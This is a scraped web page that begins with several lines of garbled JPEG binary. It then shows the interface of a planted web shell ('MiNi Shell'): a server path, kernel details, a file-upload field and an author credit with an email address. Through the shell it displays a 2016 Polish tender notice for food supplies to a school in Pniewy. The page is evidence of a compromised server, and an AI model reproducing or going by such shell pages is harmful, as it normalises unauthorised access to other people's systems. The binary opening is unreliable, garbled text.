JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160608/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160608/74719-N-2016.html

<p class="kh_header"><b>Pniewy: DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DLA ZESPOŁU SZKÓŁ IM. E. SCZANIECKIEJ W PNIEWACH</b><br>
<b>Numer ogłoszenia: 74719 - 2016; data zamieszczenia: 08.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół im.E.Sczanieckiej , ul. Wolności 10, 62-045 Pniewy, woj. wielkopolskie, tel. 61 2910607, faks 61 2911981.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zespolszkolpniewy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zespół Szkół im. E. Sczanieckiej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DLA ZESPOŁU SZKÓŁ IM. E. SCZANIECKIEJ W PNIEWACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> WARZYWA ŚWIEŻE, OWOCE   Banany  kg 680 Arbuz od lipca do września kg 150 Brukselka świeża  kg 90 brzoskwinie kg 180 Buraki kg 580 Brokuły szt 220 bazylia doniczka szt 10 Borówki op 0,5 kg (lipiec-sierpień) szt 2 Cebula kg 580 Cukinia kg 10 Cytryna kg 40 Czosnek siatka szt 33 Fasolka szparagowa żółta kg 75 Jabłka  kg 900 Gruszka kg 160 Kalafior świeży  szt 300 Kalarepa szt 95 Kapusta biała kg 660 Kapusta włoska szt 60 Kapusta czerwona kg 350 Kiwi szt 500 koperek świeży PĘCZKI 750 Koper włoski fenkuł szt 5 Kapusta pekińska -główka główka 110 Lubczyk doniczka szt 25 Marchew korzeń  kg 580 Mandarynki m-c grudzień kg 20 Mięta doniczka szt 40 nektarynka kg 100 Oregano doniczka szt 15 Ogórki zielone świeże kg 330 Papryka czerwona świeża kg 75 Papryka żółta świeża kg 10 Pieczarki świeże kg 20 Pietruszka korzeń kg 310 Pomidory kg 240 pomarańcza - m-c grudzień kg 70 Por  kg 250 Rabarbar - m-c lipiec kg 5 Rzodkiewka  pęczek 70 Rozmaryn doniczka szt 10 Sałata zielona  główka 90 sałata lodowa główka 25 Seler korzeń kg 500 Seler naciowy 0,5 kg szt 5 Szczypiorek świeży  pęczek 250 Tymianek doniczka szt 10 Truskawki - m-c lipiec kg 20 Winogrono kg 10 Zielona pietruszka świeża pęczek pęczek 700 Ziemniaki jadalne kg 10000  PRZETWORY KONSERWOWE, MĄCZNE, PRZYPRAWY, TŁUSZCZE, JAJA  Ananas puszka 580g szt 50 Bazylia 10 g szt 30 Budyń bez cukru cykoria(śmietankowy, malinowy, czekoladowy) szt 55 Brzoskwinie puszka 840 g szt 40 Curry 30 g szt 10 Cukier kryształ   op. 1 kg kg 50 Cukier puder 0,4 kg szt 5 Cukier waniliowy 32g szt 10 Cynamon 20 g szt 20 Czosnek mielony 20g szt 65 Chrzan tarty 160 g victus szt 70 Drożdże 100g szt 30 Dżem 220g(słodzony 100% sokiem)  szt 90 Estragon 10g szt 10 Fasola Jaś opakowanie 500 g szt 180 Fasola drobna luz na kg kg 90 Fasola czerwona puszka 400 g szt 45 Fasola szparagowa konserwowa 0,7 szt 160 Groszek konserwowy 400g szt 25 groch połówki luz kg 110 Gałka muszkatołowa 15 g szt 12 Galaretka 75 g (truskawkowa, wisniowa, pomarańczowa) szt 90 Herbata granulowana czarna 100g szt 150 herbata owocowa saga 25 torebek szt 40 herbata mietowa 40 g, 100 % liści mięty pieprzowej szt 10 Imbir 20g szt 10 Jaja L szt 9600 Kakao extra ciemne  100 g szt 40 Kapusta czerwona  0,9 l szt 70 Kapusta kwaszona wiaderko 5 kg Wiaderko 120 Kasza wiejska 1 kg szt 230 Kasza jaglana 400 g szt 130 Kasza gryczana niepalona 400g szt 30 Kasza kukurydziana 350 g szt 3 Kaszka manna 1kg kg 30 Ketchup pikantny 205g słoik (190 g pomidorów na 100g ketchupu) szt 110 Kawa zbozowa 147 g typu anatol  szt 25 Ketchup pikantny wyciskany  480g (192g pomidorów na 100g ketchupu szt 75 Kisiel bez cukru 40g szt 220 Kminek 20 g szt 10 Ksylitol 250 g szt 3 kolendra 10 g szt 4 Koncentrat pomidorowy 30% 950g typu pudliszki szt 220 Konserwa rybna - filet z makreli w pomidorach 170g szt 90 Kukurydza konserwowa 400g szt 70 Kurkuma 10 g szt 5 Liść laurowy 80g szt 22 Lubczyk 150 g szt 70 Majeranek 300 g szt 30 Majonez dekoracyjny 700ml winiary szt 120 Makaron nitka rosołowa,  świderki opakowanie 400g - 100% semolina z pszenicy durum szt 500 makaron pełnoziarnisty świderek 400 g szt 80 Makaron drobne muszelki, kolanko, rurki, nitka spagetti, opakowanie 500g-100% semolina z pszenicy durum szt 490 Makaron lasagne  szt 10 Makaron kokardki szt 10 Makaron wstążki długie, pióra 400 g - 100% semolina z pszenicy durum szt 50 Makaron rurki 500 g szt 60 Mąka wrocławska pszenna TYP 500 op. 1kg kg 600 Mąka orkiszowa typ 720 kg 40 Mąka tortowa typ 450 kg 10 Mąka ziemniaczana 1kg kg 30 Mąka zytnia typ 720 kg 15 Mąka ryżowa kg 2 Mąka kukurydziana kg 2 Miód naturalny 1 litr szt 100 Morela suszona 150g bez dodatku cukrów i substancji słodzących szt 5 Musztarda stołowa słoik 200g szt 70 Mus jabłkowy 720 g szt 70 Ocet jabłkowy500ml szt 60 Ocet balsamiczny 250 ml szt 2 Ogórki konserwowe 900g szt 120 Ogórki kwaszone wiaderko 3kg wiaderko 38 Ogórki małosolne 2 kg szt 25 Oregano 10g szt 15 Orzechy włoskie 100g szt 10 Oliwa butelka 5 l typu kujawska szt 110 Otręby owsiane 150g szt 10 Papryka konserwowa 900ml szt 50 Papryka mielona ostra 20g szt 170 Papryka mielona słodka 20g szt 190 Pasztet drobiowy typu profi szt 60 Proszek do pieczenia 16g szt 5 Pieprz mielony100g szt 35 Płatki kukurydziane250g typu corn flakes szt 100 Płatki bezglutenowe 250g szt 5 płatki owsiane górskie 500g szt 20 Powidła węgierkowe  310g szt 6 Przyprawa do kebabu 30 g szt 10 Przyprawa do szaszłyków 20g szt 10 pestki dyni 100g szt 10 Przyprawa do grila 20g szt 6 Ryż długoziarnisty biały opakowanie 1kg szt 320 Ryż naturalny 400g kg 40 Rodzynki 100g szt 70 Rozmaryn 15 g szt 10 Sezam 1 kg kg 10 Siemie lniane 100g szt 5 Śliwki suszone 150 g bez dodatku cukrów i substancji słodzących szt 10 Słonecznik łuskany100g szt 20 sok 100% bez dodatku cukru( jabłkowy, pomarańczowy, grejpfrut, multiwitamina, czarna porzeczka, wieloowocowy 2 l) karton 3100 Sok 100 % w kartoniku ze słomką 0,2 szt 400 Sól spożywcza, jodowana op.1kg kg 15 sól sodowo-potasowa 350 g szt 490 Soda 60g szt 5 Tymianek 10 g szt 20 Tuńczyk w oleju 170g szt 60 woda ng 5 l szt 120 woda ng 1,5l szt 80 woda ng mineralna 0,5 l szt 550 Zioła prowansalskie 10 g szt 10 Zaprawa żurek 500ml szt 100 Ziele angielskie 15g szt 60 Żelatyna 50g  szt 25 MROŻONKI, RYBYMROŻONE,PRZETWORY RYBNE Brokuły mrożone op 2 kg op 55 Brukselka mrożona op 2,5 kg op 55 Fasolka szparagowa cieta op 2,5 op 60 Fasolka żółta cała 2,5kg op 25 Groszek mrożony op 2,5  op 30 Kalafior mrożony op2 kg op 120 Makrela wędzona  kg 20 Marchew mrożona op 2,5 kg op 100 Marchew z groszkiem mrożona op 2,5 kg op 80 Marchewka mini 2,5 kg op 50 Mieszanka chińska 450g szt 80 Mieszanka europejska 2,5 kg3 składnikowa (kalafior, brokuł, marchewka) op 20 Matias - śledź solony       wiaderko 3kg szt 26 Pyzy drożdżowe op 9 szt op 680 Wiśnie mrożone op 2,5 kg op 35 Truskawki mrożone op 2,5 kg op 10 Czarna porzeczka  2,5 kg op 2 Malina 2,5 kg op 2 Mieszanka kompotowa op 2,5 kg szt 8 Ryba mrozona mintaj SHP kg 250 Ryba mrożona dorsz SHP kg 200 Ryba mrozona morszczuk SHP kg 250 Ryba mrożona miruna SHP kg 300 Szpinak mrozony op2,5 kg op 20 Włoszczyzna w paski op 2,5 kg op 170 Zupa wiosenna 8 składnikowa op 2,5 kg op 30                                                                          PIECZYWO, CIASTO  Bułka mała 50 g szt 2000 Bułka wieloziarnista 0,07 kg szt 5000 Bułka hamburgerowa 50g szt 180 Bułka hot-dog 50g szt 250 Bułka tarta 1 kg kg 250 Chleb wieloziarnisty 500g krojony szt 400 Chleb 7 ziaren 0,5 kg krojony szt 70 Chleb zwykły 600g krojony szt 600 Chleb żytni 350g-krojony szt 50 Chleb multiziarno 400 g - krojony szt 25 Chleb wiejski na maślance  500g krojony szt 50 Kawiorek 350gr szt 20 Drożdżówki 100g szt 1300 Babka typu poznańska kg 15 Pierniki kg 3 Rogale kg 3 Makowiec kg 3 MIĘSO I PRZETWORY Karkówka bk kg 250 Kości schabowe kg 30 Łopatka wieprzowa bk zmielona kg 520 Mięso gulaszowe krojone w kostkę kg 300 Schab bk kg 500 szynka bk kulka kg 90 Żeberka I klasa kg 100 Filet z kurczaka bez chrząstki świeży kg 500 Kurczak cały świeży kg 160 Filet z indyka kg 100 Skrzydła z indyka kg 80 Porcje rosołowe świeźe kg 680 Udo z kurczaka świeźe kg 490 Pałka z kurczaka kg 30 Udziec z kurczaka kg 25 Boczek parzony kg 100 Kieł. biała cieńka delikatesowa 86% miesa kg 5 Kieł. typu farmerska kg 3 Kieł. typu kanapkowa kg 3 Kieł. typu słoikowa kg 4 Kieł. typu śląska 90% miesa kg 30 Kieł. typu zielonogórska kg 3 Kieł. typu zwyczajna kg 200 Kiełbaski pieprzowe kg 5 Kieł. typu żywiecka kg 16 Kieł. Typu Wiejska kg 5 Łopatka wieprzowa wędlina -73 % mięsa kg 3 Mielonka wieprz. kg 3 Mielonka zapiekana kg 3 Ogonówka parzona kg 10 Parówki cieńkie 85% mięsa kg 45 Polędwica typu sopocka kg 15 Polędwiczka wędzona kg 8 polędwica staropolska kg 6 Salami kg 5 Serdelki kg 10 szynka bamberka 73 % mięsa kg 5 Szynka gotowana kg 18 szynka bez wędzenia 74 % mięsa kg 19 szynka starowiejska kg 3 Szynka konserwowa kg 22 szynka pieczona 73 % mięsa kg 9 szynka polska kg 3 Szynka tyrolska kg 12 szynka wiejska kg 13 szynka wiejska wędzona 99% mięsa kg 5 szynka ze wsi 96,5 % mięsa kg 5 szynka drobiowa 85 % mięsa  kg 20 Wędlina drobiowa kg 15 Szynkowa wieprzowa kg 15 Smalec kg 2 Wątrobianka kg 2 NABIAŁ  Jogurt owocowy (zawartość cukru do 10g100g) 150g szt 1000 jogurt naturalny 180 g szt 350 jogurt naturalny z płatkami 150g szt 350 jogurt naturalny 370 g szt 100 jogurty bezlaktozowe szt 10 Kefir 390g  szt 60 Masło extra 200g zaw.tłuszcz.82% szt 2500 Masło klarowane 500 g szt 2 Mleko 2% folia 1 ltr l 270 mleko  karton 2 % szt 620 Maślanka typu mrągowska 1 l szt 100 Mleko sojowe 1 l kartonik szt 5 Ser smażony 200g szt 100 ser feta 270 g  szt 40 Ser topiony bloczki 100g szt 5 Ser almette 150 g szt 120 Ser kanapkowy 150 g szt 98 ser mascarpone 250g szt 10 ser pleśniowy szt 5 Serek homogenizowany poznański200g szt 20 Ser mozarella 125 g szt 20 Sery żółte różne zaw. tłuszcz. nie mniej niż 40%(  salami, gouda) kg 100 Sery żółte różne zaw. tłuszcz. nie mniej niż 40%( królewski, rolada ustrzycka) kg 90 Śmietana słodka 12% 0,5 l- kartonik szt 310 Śmietana kremówka 30 % 250 ml-kartonik szt 30 Śmietana zakwaszana 18% 200g szt 760 Gzik Wielkopolski 200 g szt 120 Twarożek wiejski 200g szt 120 Twaróg extra śmietankowy mielony  kg 300 Twaróg wędzony zaw.tłuszcz.26% kg 10.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>ZAMAWIAJĄCY PRZEWIDUJE ZAMÓWIENIA UZUPEŁNIAJĄCE DO WYSOKOŚCI 20% ZAMÓWIENIA PODSTAWOWEGO</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 03.20.00.00-3, 15.10.00.00-9, 15.13.11.00-6, 15.11.00.00-2, 15.13.15.00-0, 15.33.11.00-8, 15.22.90.00-9, 15.00.00.00-8, 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5, 15.98.10.00-8, 15.32.00.00-7, 15.81.10.00-6, 15.81.00.00-9, 15.51.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O UDZIELENIE ZAMÓWIENIE MOGĄ UBIEGAĆ SIĘ WYKONAWCY KTÓRZY SPEŁNIAJĄ WARUNKI WYNIKAJĄCE Z ART. 22 UST 1-3 USTAWY PRAWO ZAMÓWIEŃ PUBLICZNYCH ORAZ NIE PODLEGAJĄ WYKLUCZENIU Z POSTEPOWANIA O UDZIELENIE ZAMÓWIENIA NA PODSTAWIE ART 24, ZAMAWIAJĄCY WYMAGA ZŁOŻENIA PODPISANEGO OŚWIADCZENIA STANOWIĄCEGO ZAŁĄCZNIK NR 2 DO siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMAWIAJĄCY WYMAGA ZŁOŻENIA PODPISANEGO OŚWIADCZENIA STANOWIĄCEGO ZAŁĄCZNIK NR 2 DO SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMAWIAJĄCY WYMAGA ZŁOŻENIA PODPISANEGO OŚWIADCZENIA STANOWIĄCEGO ZAŁĄCZNIK NR 2 DO SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMAWIAJĄCY WYMAGA ZŁOŻENIA PODPISANEGO OŚWIADCZENIA STANOWIĄCEGO ZAŁĄCZNIK NR 2 DO SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - TERMIN PŁATNOŚCI - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z zapisami projektu umowy stanowiącej załącznik nr 4 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> WWW.zespolszkolpniewy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół w Pniewach
ul. Wolności 10
62-045 Pniewy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2016 godzina 09:00, miejsce: ZESPÓŁ SZKÓŁ W PNIEWACH (SEKRETARIAT) UL. WOLNOŚCI 10, 62-045 PNIEWY.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 31.12.2016.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com